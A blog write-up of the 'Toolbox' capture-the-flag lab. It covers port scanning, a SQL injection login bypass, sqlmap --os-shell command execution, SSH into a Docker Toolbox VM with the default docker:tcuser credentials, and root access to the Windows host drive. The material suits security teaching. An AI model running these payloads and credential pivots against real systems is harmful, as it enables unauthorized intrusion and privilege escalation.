Myles Nieman
← All writeups

Toolbox

Overview

Toolbox is an easy Windows box with a layered environment: a Windows host runs Docker Toolbox, which spins up a Linux VM containing a PostgreSQL-backed web application. A virtual-host discovery trick surfaces an admin login at admin.megalogistic.com that is vulnerable to SQL injection. SQLMap’s --os-shell mode executes commands as the postgres user inside the container. From there, the Docker Toolbox VM’s SSH service on the internal 172.17.0.1 gateway accepts the documented default credentials (docker:tcuser), and the docker user has passwordless sudo — meaning the Windows host’s C:\ drive, mounted at /c, is browsable as root.

Path: SQLi on admin portal → os-shell as postgres in container → SSH to Docker Toolbox VM (docker:tcuser) → sudo → /c/Users/Administrator/Desktop/root.txt.

Enumeration

A full port scan reveals a Windows host with an FTP server (anonymous access), SSH, SMB, WinRM, and an HTTPS web application:

$ nmap -p- -A 10.129.96.171
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
| ssl-cert: Subject: commonName=admin.megalogistic.com
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0

Nmap full scan output for Toolbox

Two things jump out immediately: anonymous FTP exposes docker-toolbox.exe — the legacy Docker-on-Windows solution — and the TLS certificate’s common name is admin.megalogistic.com, a virtual host not in DNS. I added both megalogistic.com and admin.megalogistic.com to /etc/hosts.

Foothold — SQL Injection on the Admin Portal

Browsing to https://admin.megalogistic.com shows a login form.

admin.megalogistic.com login page

Common default credential pairs (admin:admin, admin:password) fail. Entering a single quote in the username field returns a database error:

Single-quote in the username triggers a visible SQL error

The error confirms PostgreSQL and an injectable parameter. A classic 'OR'1'='1 auth-bypass payload grants access to the admin dashboard:

Auth bypass payload logs in to the admin dashboard

Admin dashboard after login — includes a todo: “Send creds to tony”

The dashboard has limited functionality, so I moved straight to getting command execution. I saved the login POST request from Burp and fed it to SQLMap with --os-shell:

$ sqlmap -r req --os-shell

SQLMap os-shell drops an interactive prompt as postgres

The shell runs as the postgres database user. A quick look around confirms we’re inside a Docker container:

os-shell> whoami
postgres

os-shell> ls /home
tony

os-shell> ls /var/lib/postgresql
11
user.txt

The user flag is at /var/lib/postgresql/user.txt.

Lateral Movement — Escaping the Container

The FTP docker-toolbox.exe was a hint: Docker Toolbox runs a lightweight Linux VM (boot2docker) to host containers on Windows, accessible over SSH. The VM uses a well-known default credential pair: docker:tcuser.

docker-toolbox.exe retrieved from anonymous FTP

Checking /etc/hosts inside the container reveals the gateway:

postgres@bc56e3cc55e9:~$ cat /etc/hosts
127.0.0.1   localhost
172.17.0.2  bc56e3cc55e9

So 172.17.0.1 is the Docker bridge gateway — the Toolbox VM itself. I upgraded to a proper TTY and pivoted internally:

postgres@bc56e3cc55e9:~$ python3 -c 'import pty;pty.spawn("bash")'
postgres@bc56e3cc55e9:~$ ssh docker@172.17.0.1

SSH to 172.17.0.1 with docker:tcuser succeeds

Running linpeas from the container first revealed that nsenter could potentially be used for a Docker escape, but the container lacked sudo. The SSH path to the Toolbox VM was cleaner.

linpeas output inside the container, highlighting nsenter

$ ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser

docker@box:~$ sudo su
root@box:/home/docker#

sudo su as docker gives a root shell on the Toolbox VM

The docker user has passwordless sudo on the Toolbox VM.

Root

The Toolbox VM’s /c directory is the Windows host’s C:\ drive:

root@box:/home/docker# ls /c
Users
root@box:/home/docker# ls /c/Users
Administrator  Default  Public  Tony
root@box:/c/Users/Administrator/Desktop# ls
desktop.ini  root.txt

The Windows Administrator desktop is directly readable, and the root flag is there.

Takeaways

  • SQLMap --os-shell against a PostgreSQL backend is a straightforward path to command execution — the COPY TO/FROM PROGRAM technique runs system commands as the database service user.
  • Docker Toolbox’s default SSH credentials (docker:tcuser) are documented but often overlooked; combined with passwordless sudo on the VM and the Windows drive mounted at /c, this collapses a container escape into trivial host access.